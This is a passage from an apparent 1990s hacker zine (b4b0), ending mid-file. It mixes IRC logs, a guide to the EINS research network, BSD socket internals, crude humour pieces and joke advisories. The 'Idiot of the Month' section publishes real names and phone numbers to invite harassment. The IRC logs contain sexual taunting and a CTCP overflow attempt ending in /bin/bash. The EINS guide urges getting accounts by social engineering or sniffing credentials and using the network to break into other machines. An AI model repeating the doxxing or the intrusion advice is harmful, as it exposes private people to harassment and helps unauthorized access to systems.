[bobbi(datasoftte@pool-207-205-160-121.nwrk.grid.net)] i got disconnected, sorry [msg(bobbi)] did you know i had a degree in pimpology? [bobbi(datasoftte@pool-207-205-160-121.nwrk.grid.net)] there u go again [msg(bobbi)] i wanna test it out on you in person. [bobbi(datasoftte@pool-207-205-160-121.nwrk.grid.net)] have u ever gotten your cock sucked>? [msg(bobbi)] of course. [bobbi(datasoftte@pool-207-205-160-121.nwrk.grid.net)] who sucked it? [msg(bobbi)] it was the gf mistress. [bobbi(datasoftte@pool-207-205-160-121.nwrk.grid.net)] your wife doesnt suck ur cock? [msg(bobbi)] no she sucks my friend's dick, however. [bobbi(datasoftte@pool-207-205-160-121.nwrk.grid.net)] kewl [bobbi(datasoftte@pool-207-205-160-121.nwrk.grid.net)] where do u like to cum? [msg(bobbi)] you're one twisted fucker. [bobbi(datasoftte@pool-207-205-160-121.nwrk.grid.net)] may b eu should ask ur mom to suck ur cock [msg(bobbi)] maybe i'll stuff it in your face, beeoytch! bobbi: No such nick/channel RLoxley, showing lore the fear ¯ [msg(rlox1ey)] Send me some of your code. ùìù #dragoon-x/option is idle.. out. (l/dX) [RLox1ey(mageus@monet.bestweb.net)] child, there is more to life than just code [RLox1ey(mageus@monet.bestweb.net)] lets see you perform gyaku game ate? [RLox1ey(mageus@monet.bestweb.net)] or perhaps some goshin jitsu ¯ [msg(RLox1ey)] ARE YOU STILL INTO LITTLE BOYS KENT? ¯ [msg(RLox1ey)] I'm like a n1nja and shit, fear. [RLox1ey(mageus@monet.bestweb.net)] you cant??? guess that makes you lame [RLox1ey(mageus@monet.bestweb.net)] goshin jitsu is not ninjitsu lamer [RLox1ey(mageus@monet.bestweb.net)] it is an aikido kata hah [RLox1ey(mageus@monet.bestweb.net)] what a cluebie what provoked him to say that lore [RLox1ey(mageus@monet.bestweb.net)] HAHHAHAHAHAHAHAHAHAH ¯ [msg(RLox1ey)] I win. [RLox1ey(mageus@monet.bestweb.net)] dreamer [RLox1ey(mageus@monet.bestweb.net)] i have been TEACHING martial arts for longer than you have been alive boy [RLox1ey(mageus@monet.bestweb.net)] get a grip ¯ [msg(rlox1ey)] Okay, be at defcon. [RLox1ey(mageus@monet.bestweb.net)] count on it (lore) [RLox1ey(mageus@monet.bestweb.net)] i have been TEACHING martial arts for (lore) longer than you have been alive boy (lore) OH MY GOD (lore) HEZ GONNA KARATE CHOP ME LOL! LMAO [RLox1ey(mageus@monet.bestweb.net)] there will be no fight lore, only your slaughter [RLox1ey(mageus@monet.bestweb.net)] grow up ùìù #comtech/Optik9 is away: (Auto-Away after 10 mins) [BX-MsgLog On] he teaches people martial arts on eye are cee@$#% ¯ [msg(RLox1ey)] CHICKEN ¯ [msg(RLox1ey)] BORK BORK BORK (lore) ¯ [msg(rlox1ey)] Okay, be at defcon. (lore) ¯ [msg(RLox1ey)] We'll see who has the most fighting skill. (lore) [RLox1ey(mageus@monet.bestweb.net)] there will be no fight lore, only your (lore) slaughter (lore) ¯ [msg(RLox1ey)] CHICKEN (lore) ¯ [msg(RLox1ey)] BORK BORK BORK [RLox1ey(mageus@monet.bestweb.net)] and realize that people have different strengths ð spiked/#HiSec signs up for Karate class - ONLINE! (lore) Spiked, heh. [RLox1ey(mageus@monet.bestweb.net)] guess you cant read either ¯ [msg(rlox1ey)] he teaches people martial arts on eye are cee@$#% [dcc(n1nja-x)] [09:30] B:1 C:#comtech AC:2 S:8 CS:dallas.tx.us.undernet.org:6667 he is always there and never out$#% how can he teach shit? ¯ [msg(RLox1ey)] ð spiked/#HiSec signs up for Karate class - ONLINE! ¯ [msg(RLox1ey)] he is always there and never out$#% how can he teach shit? [dcc(l-n1nja)] [12:30] B:1 C:#comtech AC:2 S:7 CS:Baltimore.MD.US.Undernet.Org:6661 (lore) Heh. [RLox1ey(mageus@monet.bestweb.net)] so silly [RLox1ey(mageus@monet.bestweb.net)] just cause i am connected doesnt mean i am here (lore) [RLox1ey(mageus@monet.bestweb.net)] just cause i am connected doesnt mean i am (lore) here (lore) YEAH [RLox1ey(mageus@monet.bestweb.net)] guess you all are too lame to realize that (lore) RIGHT [RLox1ey(mageus@monet.bestweb.net)] goodbye [RLox1ey(mageus@monet.bestweb.net)] *_(ignored)_* ¯ [msg(RLox1ey)] Were pissing ourselves in #hisec ..(msg[rlox1ey]) yoh. can i sign up for some of those online karate classes? ¯ [msg(RLox1ey)] Don't go! . . . -> *lordrage* Have you been drinking again? iM Noetrg fuvjing druncrk !b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0[ 6 ]b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0 Welcome to the Idiot of Month this issues winner ****> Bronc Buster first name - eric phone - 530-674-1736 girlfriend, Joy 530-755-2557 We were going to give him a plaque, but due to his lack of skill and our lack of money, it's probably not going to happen. give him a call for b4b0!@ (p.s. tell him your korean and you eat horses) (also, tell him you'll cut his hair at defcon) *b0nus*b0nus*b0nus*b0nus*b0nus*b0nus*b0nus*b0nus*b0nus*b0nus*b0nus*b0nus*b0nus so1o: name - Chris Evans Undergraduate student of Lady Maggaret Hall, Oxford *b0nus*b0nus*b0nus*b0nus*b0nus*b0nus*b0nus*b0nus*b0nus*b0nus*b0nus*b0nus*b0nus . . . *nosilA* does this work? CTCP from nosilA: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAA/bin/bash -> *nosila* I don't think so. !b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0[ 7 ]b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0 Tampax Dox Gary Gnu Before you start..... Relax and take your time. If you're tense, your muscles will tighten = up. When you're relaxed, the tampon slides in without any resistance. = Wash your hands. Next, find the position that's comfortable to you. = Most women either sit on the toilet with knees apart, squat slightly = with knees bent and far apart, or stand with one foot on the toilet = seat. Remove the tampon from the wrapper. Make sure the removal cord = is hanging outside the smaller inner tube. Now you're ready to follow = these easy instructions... Avant de commencer.... Detendes-vous et prenez votre temps. Si vous etes tendue, vos muscles = se contracteront. Par contre, si vous etes detendue, le tampon = s'inserera sans difficulte. Lavez-vous les mains, puis adoptez une = position dans laquelle vous vous sentez a l'aise. La plupart des femmes = s'assoient sur le siege des toilettes en ecartant les genoux, ou = s'accroupissent legerement en ecartant les jambes ou encore se tiennent, = debout acec un pied sur le siege des toilettes. Retirez le tampon de = l'enveloppe. Assurez-vous que le cordonnet de retrait depasse bien du = plus petit tube de l'applicateur. Maintenant, vous etes prete a lire = ces instructions faciles a suivre... Figure 1.1 Tampax Tampon=20 =20 Inner Pusher Tube Tube interieur pour pousser | | _ Round Tip | _________________________________ / Bout = arrondi _____________|||| _______________________|_ / | ||| | | =20 --------------------------------| | | |______________||| |_________________________| | \ ||||______________________________| | \ =20 Removal Cord \_ Grooved Finger Grip | Cordonnet de retrait Anneaux stries | | Outer Insertion Tube Tube exterieur d'insertion The right way to use TAMPAX tampons - Always remove your used tampons before inserting a new one. - Be sure to remove the last tampon you use at the end of your period. - Use the lowest absorbency tampon for your flow. - Change your tampon every 4-8 hours, as needed. - TAMPAX Tampons can be worn up to 8 hours during the day or at night. - Tampons are to be used during menstruation only - never between = periods. La bonne facon d'utiliser les tampons TAMPAX - Retirez toujours le tampon utilise avant d'en inserer un autre. - N'oubliez pas de retirer le dernier tampon a la fin de vos = menstruations. - Utilisez le plus faible degre d'absorption pour votre flux. - Changez de tampon toutes les 4 a 8 heures au maximum, de jour comme de = nuit. - Les tampons ne s'utilisent que pendant les menstruations, jamais entre = celles-ci. Helpful Hints About Absorbency Every woman has her own unique menstrual flow, which can vary from month = to month and from day to day. As you learn your own flow, you'll find = that it may be heavier at the start of your period and lighter toward = the end. You should evaluate your flow and select the tampon with the = minimum absorbency to meet your needs. You can get the best protection = and the most comfort by choosing different absorbencies during your = period. You may want to use different tampon absorbencies for different = days of your menstrual period. Make sure that you always use the lowest = absorbency to meet your needs. =20 Conseils utiles sur le degre d'absorption Toutes les femmes ont menstruel different, qui peut varier d'un mois sur = l'autre et d'un jour a l'autre. Au fur et a mesure que vous vous = habituerez a votre propre flux menstruel, vous vous rendrez peut-etre = compte qu'il est plus abondant au debut des regles et plus leger a la = fin. Vous devriez evaluer votre flux et choisir le tampon offrant le = degre d'absorption le plus faible qui correspond a vos besoind. Pour = obtenir la meilleure protection et le plus de comfort possible, = choisissez des tampons aux differents degres d'absorption pour les = differents jours de vos menstruations. Utilisez toujours le degre = d'absorption le plus faible qui convient le mieux a vos besoind. Figure 1.2 Tampon Absorbency Chart (English Version) LIGHT LIGHT TO MEDIUM - Lites Junior Absorbency - Slender Regular Absorency - Regular Absorbency MEDIUM TO HEAVY VERY HEAVY - Super Absorbency - Super Plus Absorbency = =20 (Version Francais) LEGER LEGER A MOYEN - Degre d'absorption Junior - Extra-mince, degre = d'absorption =20 Regulier - Degre d'absorption = Regulier MOYEN A ABONDANT TRES ABONDANT - Degre d'absorption Super - Degre d'absorption Super = Plus How to insert a TAMPAX tampon Comment inserer un tampon TAMPAX 1) With one hand, hold the applicator by placing your thumb and middle = finger on the finger grip rings. Hold the applicator so the tip is = pointing toward you. D'une main, saisisse l'applicateur entre le pouce et le majeur, a la = hauteur des anneaux stres. Tenez l'applicateur de facon a ce que le = bout soit pointe vers vous. 2) With your other hand, gently spread the skin outside your vagina. = Insert the tip of the applicator into the vaginal opening. Point the = tip toward your lower back and relax your muscles. De l'autre main, ecartez delicatement la peau entourant l'orifice = vaginal. Inserez le bout de l'applicateur dans l'ouverture du vagin en = l'inclinant vens le bas des reins et relacher vos muscles. 3) Gently slide the applicator into the vagina. It will easily follow = the path of the vagina, which angles up and slightly toward your lower = back. If the applicator doesn't slide in easily, gently rotate (turn) = it to the right or left as you push. Inserez delicatement l'applicateur dans le vagin. Il suivra facilement = la courbe du vagin, qui marque un leger angle vers la baz du dos. Si = l'applicateur ne s'insere pas facilement, tournez-le doucement vers la droite ou vers la gauche en le poussant. 4) Insert the applicator up to the finger-grip rings until your fingers = touch your body. With your index finger, push the inner tube all the = way into the outer tubes. Or use your other hand to push in the inner = tube. One tube is now inside the other. Inserez l'applicateur jusqu'a ce que vos doigts touchent votre corps, = c'est-a-dire jusqu'aux anneaux stres. Avec l'lindex poussez = completement le tube interieur dans le tube exterieur ou, si vous = preferez, utilisez l'autre main pour pousser le tube interieur. Un tube = se trouve maintenant dans l'autre. 5) Remove both tubes. If your tampon has a CARDBOARD APPLICATOR. IT = CAN BE FLUSHED. However, if your tampon has a PLASTIC APPLICATOR, DO = NOT FLUSH IT but dispose of it in a waste receptacle. The tampon should = now be comfortably inside you with the removal cord hanging outside your = body. When a TAMPAX tampon is inserted properly, you shouldn't feel any = discomfort. If you feel uncomfortable, the tampon may not be placed far = enough inside. If this occurs, just remove the tampon and try again = with a new one.=20 Retirez les deux tubes. SI L'APPLICATEUR EST UN CARTON, VOUS POUVEZ LE = JETER DANS LES TOILETTES. Cependant, SI L'APPLICATEUR EST EN PLASTIQUE, = jetez-le directement a la poubelle ET NON DANS LES TOILETTES. Le tampon = devrait maintenant etre bien en place et le cordonnet devrait pendre a = l'exterieur de votre corps. Lorsqu'un tampon TAMPAX est correctement = insere, vous ne le sentirez pas. Si vous ne vous sentez pas a l'aise, = c'est que vous n'avez pas insere le tampon assez loin. Le cas echeant, = retirez le tampon et inserez-en un autre. To remove your TAMPAX tampon Sit on the toilet with knees apart, or squat slightly. Keeping your = muscles relaxed, pull the cord gently and steadily downward at the same = angle you used to insert the tampon. Then simply flush the tampon away. Comment retirer un tampon TAMPAX Assayez-vous sur le siege des toilettes les genoux ecartes ou = accroupissez-vois legerement. Relachez les muscles en tirez = delicatement mais fermement sur le cordonnet dans le meme angle que vous = avez utilise pour l'inserer. Puis jetez simplement le tampon dans les = toilettes. For a free TAMPAX sample go to: http://tampax.com/cgi-bin/suite/sample/freeform.cgi?country=3Dus Questions: Call 1-800-523-0014 Questions: appelez le 1-800-5230014 !b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0[ 8 ]b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0 EINS and the z39.50 Protocol Suite. Please Excuse any mistakes, I wrote this when stoned. Werd to dgm for letting me use his computer and smoking with me. :> --> What is EINS? EINS, or European Information Network Services exists to provide the transport of data services to scientific and technological research centres across Europe, including the European Space Agency (ESA). EINS is technically a series of interlinked information servers linked together to ensure distribution and availiability of research data. EINS is networked using a gateway designed by the ESA called the MIRO Gateway, this uses and basically enhances the Z39.50 protocol suite for information retrival. --> Z39.50 protocol The z39.50 Protocol Suite is probably one of the best Protocol suites for Information Retrival to be used on a research scale. The main reason behind this is that the z39.50 protocol suite incorporates many other protocols into its own suite, allowing co-existence between many protocols for data-retrival and posting. Today it is commonly used among the large and more famous Libraries for exchange of bibliographical data as well as establishments already stated. The z39.50 protocol suite works on the basis of TCP/IP which is used for the Internet. Any network encorporating TCP/IP can provide a means of transport for a machine using the z39.50 protocol. The z39.50 protocol has a number of services defined within the protocol which users can make use of. - Initialisation Service This sets up connections ready for data transfer. - Search Service This enables the user to search for data on machines connected using z39.50, This service also deals with the relaying of data and sorting of search resuls. - Present Service This is a definition of the Search Service for how much data is to be transferred, and in what order etc. - Access Control This exists as the protocol's main security control, deals with login passwords, copyright of data etc. - Resource Control Although this service is not always used, it acts as supervision, ie. an admin can restrict which data resources users have access to and download rates etc. This is mainly used in Academic Establishments where large amounts of users requires tighter control of resources. - Delete Service This service exists to allow users access to delete records. - Extended Services Extended services include the 'help' facility which can guide users on how to operate the search facilities etc. The z39.50 protocol as used in EINS is slightly different than the original RFC draft for the implementation of the z39.50 protocol suite, although this original draft has now evolved into EINS as this is the primary network encorporating z39.50. EINS uses the MIRO gateway to transfer data on top of the original z39.50 protocol. More about the MIRO Gateway can be found in the next section. --> MIRO Gateway The MIRO Gateway is used in EINS to interlink several European Information Service Networks and encorporating them all into one network using the MIRO Gateway. It makes it possible for users of any of the network services to access databases and other networked information. The advantages of the EINS, and the reason for its popularity among scientific and academic research establishments is that, because of the MIRO Gateway, the best information networks are linked into one resulting in far more data from different networks being made availiable for the users. Fig. 1 below helps demonstrate the network architecture of EINS under the MIRO Gateway. I have broken the diagram into 5 sections, labelled 1-5 for ease of explanation. - Fig 1. - MIRO System Architecture ----- ----- ---------- - 1 - | ERN | | PSN | | Internet | ----- ----- ---------- \ | / \ | / \ | / \ | / \ | / \ | / \ | / \ | / \ | / \ | / \ | / \ | / | | -------------- - 2 - | MIRO Gateway | -------------- | | | --------------- - 3 - | Origin Server | --------------- | | ----------------- | | - 4 - | Z39.50 Protocol | | | ----------------- / | \ / | \ / | \ / | \ / | \ / | \ / | \ / | \ ------------- ------------- ------------- - 5 -| MIRO Target | | MIRO Target | | MIRO Target | ------------- ------------- ------------- 1 - This layer shows the original networks used to compile the data of EINS. ERN - European Research Networks, used for data transfer between Academic, Technological and Scientific Establishments. PSN - Packet Switching Networks, such as GNS Dialplus, Sprintnet, JANET, and other European/International networks, usually encorporating the x.25 protocol. Internet - The final network for data collection. The Internet, with vast amounts of data for research use (the most favoured network nowadays). 2 - The MIRO Gateway acts as a sort of proxy to allow users access EINS to gather Information from the networks discussed in Section 1 of the diagram. The MIRO Gateway builds in efficient data collecting techniques, developed by The European Space Agency (who themselves are connected to EINS). It uses a transparent command language to ease output formatting, and access accounting. 3 - The origin server is the primary machine used in the EINS. It is of course named, EINS, and it is this machine that is accessed for entry to the data and records stored on EINS. 4 - From this section of the diagram, the network flow turns direction, as machines accessing EINS or, as labelled on the diagram, The Origin Server use z39.50 to access the public data and search through it with ease. Look under the 'z39.50 Protocol' section for more information on how the z39.50 protocol operates. 5 - MIRO Targets are simply the machines accessing EINS requesting data transfer/recieval. --> Accessing EINS There are actually quite a few ways to access EINS. As EINS gathers information from so many sources, it has network compatibility with so many different protocols therefore allowing access from so many different networks. - Firstly, and formost, EINS is accessable via telnet. Although I have never personally accessed via telnet it is availiable to users at the address telnet.eins.org although this may be rather slow. - EINS is also connected to GNS Dialplus, a .uk network encorporating the x.25 protocol. GNS Dialplus is, in my opinion, a more safer way to access EINS if you are doing anything naughty, although I am not saying you should. :> However, access to GNS Dialplus is probably only useful if you are in the United Kingdom. Here are some access numbers for GNS Dialplus for you lovely Brits:- London ------> 0181 810 5576 Manchester --> 0161 834 4543 Birmingham --> 0121 643 6521 Bristol -----> 0117 929 3772 Glasgow -----> 0141 221 5851 Leeds -------> 0113 245 8213 Edinburgh ---> 0131 313 3721 Cambridge ---> 01223 844 597 Reading -----> 01734 394 452 EINS is located on GNS Dialplus as the address EINS-QUEST and takes you to exactly the same machine as telnet.eins.org does (naturally). - Access to EINS is also possible via Sprintnet on the NUA 022226410174, although I have personally never tried this NUA I am told that it is valid for access to EINS. There are many other ways to access EINS via networks around Europe and The World, I guess the best idea is to scan for them. Try looking around JANET for a gateway perhaps. --> Exploring EINS To explore EINS you will need an account on the system to access the data. Try your basic social engineering techniques to gain accounts, or find a machine using EINS and sniff the traffic on the machine using a packet sniffer tool, the possiblities are endless, you're the hacker, figure it out. Upon connection to EINS, however you choose to connect, you will be presented with a login screen, asking you to enter your valid QUEST-ID. This is you authentication code to gain access to EINS. So go be a hacker and get some kodes. :> To explore EINS to its maximum potential it will be very useful (essential even) to know the basic simple commands for navigating EINS. The commands used in EINS are abbreviations of words, and enable you to take complete control over your time navigating EINS. Below is a list of the commands, along with uses and definitions. This command list was adapted from the EINS command list found in The British Library. 1 - Entering Files. - BEGIN This command is used to begin searching the EINS. It kills any previously open search process and starts fresh. The abbreviation for this command is simply the letter 'b'. eg. B hack This command line would open a new query file recorded as 'hack'. 2 - Searching - SELECT This command enables you, the user, to define search strings, limit your search results etc. eg. S space This command line would set search select on topics involving space. eg. S 2/98-99 This command line would limit data search for files created between 2/98 and 2/99. - EXPAND The Expand command enables you to expand you search strings and pull more data from relative places. eg. E space This command line would expand on the search results found in the string space. - DELETE The Delete command enables the user to delete specific search sets. eg. DELETE ALL THis command line would delete all open search files. 3 - Looking at References - PRINT The Print command enables you to send search references to a specified email address. eg. PR kodez EMAIL=gr1p@b4b0.org The above command would send the search reference data called kodez to gr1p@b4b0.org. - DOWNLOAD This command would allow you to save search references to a file on your machine. eg. DL zerodayz /home/gr1p/zero.txt The above command will save search reference 'zerodayz' output to /home/gr1p/zero.txt. - SAVE The alternativ to the download command is SAVE. Both provide the same function to the user, although download seem's to be prefered for more portable saving options. eg. SAVE hacker This would simply save the search reference list 'hacker' to your 'search favourites' list. 4 - Other Commands - HELP Help is provided as part of EINS. THis will enable you to grasp much greater control over the commands in use of EINS. It is recommended that HELP is looked at when in doubt. eg. HELP Will give you help on how to make greatest use of the command. - LOGOFF Logoff simply log's you off your EINS session. eg. LOGOFF --> End You may be asking, "what use does this have for me, the typical network hacker?" Well, the answer is simple, because of the large amount of data networks linked to form EINS, there are a large amount of machines, many of these machines will have poor security, world-readable/writable files, password information in readable files etc. You could even do searches for open x.25 gateways, access numbers to networks etc. The possiblities are endless and from this information you could gain entry to numerous machines connected to networks worldwide. Although I am in no way condeming the use of EINS as a gateway to other networks, nor am I saying I have done it, I am simply suggesting possiblities. :> gr1p@b4b0.org !b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0[ 9 ]b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0 Intro To *BSD Socket Layer Internals by jayenz the socket layer deals with IPC at the system. the network subsystem is generally divided into 3 layers: transport, network, and network-interface layer. the layers are respective to the transport, network, and link layers of the OSI model. data is received at the network interface and is moved up the layers until it is placed in a recieve queue for the dest socket. primary focus is put on the socket layer workings. all examples done from a NetBSD box, so some things may not be the same for linux (specifically the Mbuf stuff, check out ). the highest layer of the network subsystem, the transport layer or socket layer, works by using what is called a "socket data structure" that is loaded dynamically by malloc(). socket data structures take the following form (from ): ---`BEGIN CODE`--- struct socket { short so_type; /* generic type, seesocket.h*/ short so_options; /* from socket call,seesocket.h*/ short so_linger; /* time to linger while closing*/ short so_state; /* internal state flags SS_*, below */ void *so_pcb; /* protocol control block */ struct protosw *so_proto; /* protocol handle */ /* * Variables for connection queueing. * Socket where accepts occur is so_head in all subsidiary sockets. * If so_head is 0, socket is not related to an accept. * For head socket so_q0 queues partially completed connections, * while so_q is a queue of connections ready to be accepted. * If a connection is aborted and it has so_head set, then * it has to be pulled out of either so_q0 or so_q. * We allow connections to queue up based on current queue lengths * and limit on number of queued connections for this socket. */ struct socket *so_head; /* back pointer to acceptsocket*/ struct soqhead *so_onq; /* queue (q or q0) that we'reon*/ struct soqhead so_q0; /* queue of partial connections*/ struct soqhead so_q; /* queue of incomingconnections*/ TAILQ_ENTRY(socket) so_qe; /* our queue entry (q or q0) */ short so_q0len; /* partials on so_q0 */ short so_qlen; /* number of connections onso_q*/ short so_qlimit; /* max number queuedconnections*/ short so_timeo; /* connection timeout */ u_short so_error; /* error affecting connection */ pid_t so_pgid; /* pgid for signals */ u_long so_oobmark; /* chars to oob mark */ /* * Variables for socket buffering. */ struct sockbuf { u_long sb_cc; /* actual chars in buffer */ u_long sb_hiwat; /* max actual char count */ u_long sb_mbcnt; /* chars of mbufs used */ u_long sb_mbmax; /* max chars of mbufs to use */ long sb_lowat; /* low water mark */ struct mbuf *sb_mb; /* the mbuf chain */ struct selinfo sb_sel; /* process selecting read/write */ short sb_flags; /* flags, see below */ short sb_timeo; /* timeout for read/write */ } so_rcv, so_snd; }; ---`END CODE`-- as you can blatantly see, there are structs for both the send and recieve buffers. a socket data structure is setup when socket(2) is called. After it is called, the member caddr_t f_data; /* vnode or socket */ of the kernel descriptor table struct () points to the socket structure. this is somewhat parallel to the vnode struct that is used with filesystems. NOTE: the "so" prefix the struct members is used to denote its a second-level routine. i.e. sobind(), solisten(). ok. the data is stored in the sockbuf queue as a chain of mbufs (mbufs covered later). data enters the system via systems calls like send(), and is passed as a chain of mbufs to be sent outward over the interface. data recieved is passed to the socket layer in mbuf chains where they are held until requested. hi and low watermarks are used to control the flow of data. these watermarks control the operation of the select(2) sytem call for testing whether the socket is ready for reading and writing. the socket data structure must maintain the queues of messages being sent and received by the socket. mbufs take care of this. The separate queues for incoming and outgoing messages are stored in their own data structures called "Mbufs". the Mbuf data structures generally take the following form: struct mbuf { struct m_hdr m_hdr; union { struct { struct pkthdr MH_pkthdr; /* M_PKTHDR set */ union { struct m_ext MH_ext; /* M_EXT set */ char MH_databuf[MHLEN]; } MH_dat; } MH; char M_databuf[MLEN]; /* !M_PKTHDR, !M_EXT */ } M_dat; }; [...] struct m_hdr { struct mbuf *mh_next; /* next buffer in chain */ struct mbuf *mh_nextpkt; /* next chain inqueue/record*/ caddr_t mh_data; /* location of data */ int mh_len; /* amount of data inthismbuf*/ short mh_type; /* type of data in this mbuf*/ short mh_flags; /* flags; see below */ }; Mbufs are 128 bytes long and use 100-108 bytes specifically used for data storage. Messages read over the socket can be stored in a single mbuf structure under the conditions that message <= 108 bytes. If not (blargh), you can use an external mbuf cluster for the rest of the data. operation of socket layer in associating two processes a foreign client starts an active open, and the server will passively accept connections. the sockets are created by users with the socket(2) system call, and created internally by the socreate() routine. the socreate() routine allocates the space for the socket data structure talked about above. after socreate(), the address is bound internally by the sobind() routine. if the protocol isnt a connectionless one, a PRU_LISTEN request is sent the protocols to set the backlog on the socket. to now accept connections, accept() must be called which internally invokes the soaccept() routine. on the client side, an soconnect() is done internally for the regular connect() to establish a connection. this inturn sends a PRU_CONNECT request to the protocol. after the initial soconnect(), an soisconnecting() is issued to initiate the 3-way handshake if we are dealing with tcp. after the connection has been established, data must be transfered. sosend() is used internally to copy data from the process's addess space in to the mbufs. afterwords it is moved down through other layers and sent outwards on the interface. on recieving the sent data, it is sent to the remote interface, up the different layers with each layer taking off its own header, i.e( IP, TCP headers). the data is then copied onto the socket's input queue (in our case so_rcv, see above). after on the queue, the sorecieve() routine can copy the data out to be read by the read() syscall. termination to end the communication between the two sockets, the soshutdown() routine is called. this will flush the recieve buffer and mark the socket as not able to recieve anymore data. A PRU_SHUTDOWN request is sent to the protocol. the connection is now dead. this was just a brief intro, if you want more info go get a book -jayenz (modu1e@hotmail.com) !b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0[ 10 ]b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b Possibly, the stupidest thing we've ever gotten. Enjoy. ResiD@home.com fjear sperm . ----------------------------- CUT HERE ------------------------------ --------------------------------------------------------------------- Masturbation FAQ - R e s i D - --------------------------------------------------------------------- Table of Contents: Q and A ------- 1.1 - Why Masturbate? 1.2 - What if I get caught? 1.3 - Is ResiD a Pervert? 1.4 - How Can I be the best Maturbater I can be? 1.5 - If I masturbate, would the size of my penis increase? 1.6 - Is it normal to masterbate? 1.7 - Is masturbation a sin? Tips ---- 2.1 - Some tips to keep clean. --------------------------------------------------------------------- Q and A: 1.1 - Why Masturbate? Masturbation isn't something that is just plain old nasty, it's great for relieving stress and such. 1.2 - What if I get caught? Well.. If you get caught, your might end up in a mental institution, but there are many ways for one to prevent getting caught. Locking the door or blocking it with a chair would be my recommendation. 1.3 - Is ResiD a pervert? Yes. 1.4 - How Can I be the best Masturbater I can be? Masturbation is a "sport" (as I like to call it) much like any other. They all take determination. If you wanna be the best you can be, then I suggest you unzip them levis and start whackin' 1.5 - If I masturbate, would the size of my penis increase? My Father told me so. 1.6 - Is it normal to masturbate? Yes.. It is more then normal. I think very highly of whackers. a small servey was done in 95 about Masterbation. The results were outstanding! it seems that 70% of all females at the age of 18 have tried Masturbation atleast once, and 90% of all males at the age of 18 have tried masturbation atleast once. 1.7 - Is Masturbation a sin? No, Masterbaters are loved by the world. -------------------------------------------------------------------------- Tips: 1: Before you are about to bl0w your load.. try putting a sock over your penis, you will be suprised at the results. Your hands will be absolutly cumless. 2: If your one of those guys that like to please the laddies, or just like to Masterbate for a long time, stop before your about to blow your load, then start again after about 10 seconds. if you don't know what to do between that 10 second time period, try kissing the girl or start on da titties. -------------------------------------------------------------------------- Kisses to: | Comment b4b0 [www.b4b0.org] #b4b0 / efnet loophole [www.loophole.org] #Main / chrome.unixgeeks.com dr0z the Crack Baby [www.bitched.blinx.net] Kan "Unknown Protocols" XeXeN "BioDigital rocks j0r nUtz" worms "It was like that when I got here" sreality "Everyones a niggah" miah "*** ResiD has quit IRC (Killed (miah (fuck you die))" My Girlfriend (Whatever her name is) rootshell "What would I do wiffout you?" PhrznCorpz (Female) "shitty" Disses to: dal.net | "ThEE lag EEz kEElEEng mEE" !b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0[ 11 ]b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b b4b0 advisory [ Odometer Exploit ] [ Feb 3 1999 ] -- Platform: 1975 Volvo 244 DL -- Program: Odometer and Tripometer -- Info: This advisory is in memory of atreyu (loser extraordinaire) and Sheepie/Phartmang the old 2600 bots. -- Synopsis: A vulnerability exists in the 1975 Volvo 244 DL's odometer and tripometer, making the car seem more elite than it is, possibly forcing the administrator to buy a Saturn. -- Exploit: This vulnerability should be widely distributed to all security experts because b4b0 knows that the average BUGTRAQ reader's favorite car is a vintage Volvo. The Volvo's odometer and tripometer work in conjunction with one another to keep track of the miles an administrator spends driving between home, work (to reboot the NT boxes for their lazy admins), and Taco Bell (Yo Quiero b4b0). Using a sophisticated piece of equipment (ie paperclip, wood chunk, pencil), one can exploit the odometer so that it does not track the mileage. The exploit is simple yet evasive. By compressing the button to "reset" the tripometer, the device is rendered useless. If left in the compressed position, the odometer will not work. -- Fixes: To follow b4b0's workaround tradition, we recommend that you downgrade to a Ford Pinto or make the ultimate purchase of a Saturn. !b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0[ 12 ]b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b Stolen ISS Warez Anonymous /* * Copyright (C) 1991 ISS, Inc. * All Rights Reserved. * * THIS IS UNPUBLISHED PROPRIETARY SOURCE CODE OF ISS * The copyright notice above does not evidence any * actual or intended publication of such source code. * * This code can be very dangerous if put in the wrong hands. * Do not distribute. * */ #include int main(void) { printf("Hello World"); return; } !b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0[ 13 ]b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b Strange, this looks a LOT like r4lphs nttt.c... el8. /* * phusnttt.c - TCP/IP TIC TAC TOE by phusnikn #decepticons or #linuxwarez * You guessed it. Tic tac toe, taken to the next level. Play your * friends, play your mom, even play so1o! Works on *BSD* and Linux * as far as I know. Mail phusnikn@usa.net if it works on your non * *BSD*\Linux system. If you don't like something in the code, * for christs sake, don't tell me, just change it. Don't distribute * modified versions, blah blah blah. The connector will always be * X and the connected to will be O. * * DO NOTTT RUN THIS FUCKING PROGRAM AS ROOT. DONT GET OWNED BY * STUPIDITY. * compile: gcc -O2 -o nttt nttt.c * Have fun. * 12/31/1998 * phusnikn@usa.net */ #include #include #include #include #include #include #include #include #include /* defines */ #define X 1 #define O 0 #define PORT 1999 /* Note Server/Client must use the same port. */ /* color defines 1;31 1;32 1;34 */ #define END "" #define RED "" #define GREEN "" #define BLUE "" #define BOLDWHITE "" #define BGRED "" /* function prototypes */ int main(int argc, char *argv[]); /* duh */ unsigned long getip(char *hostname); /* resolve hostname */ void initiate(unsigned long ip); /* initiate a connection */ void wait_for_connection(void); /* listen for a connection */ void usage(char *name); /* -h */ void play_ttt(void); /* main ttt function */ void draw(void); /* draw the grid on the screen */ void x_input(void); /* input X value */ void o_input(void); /* input O value */ void x_plot(int x_coord); /* update the grid */ void o_plot(int o_coord); void 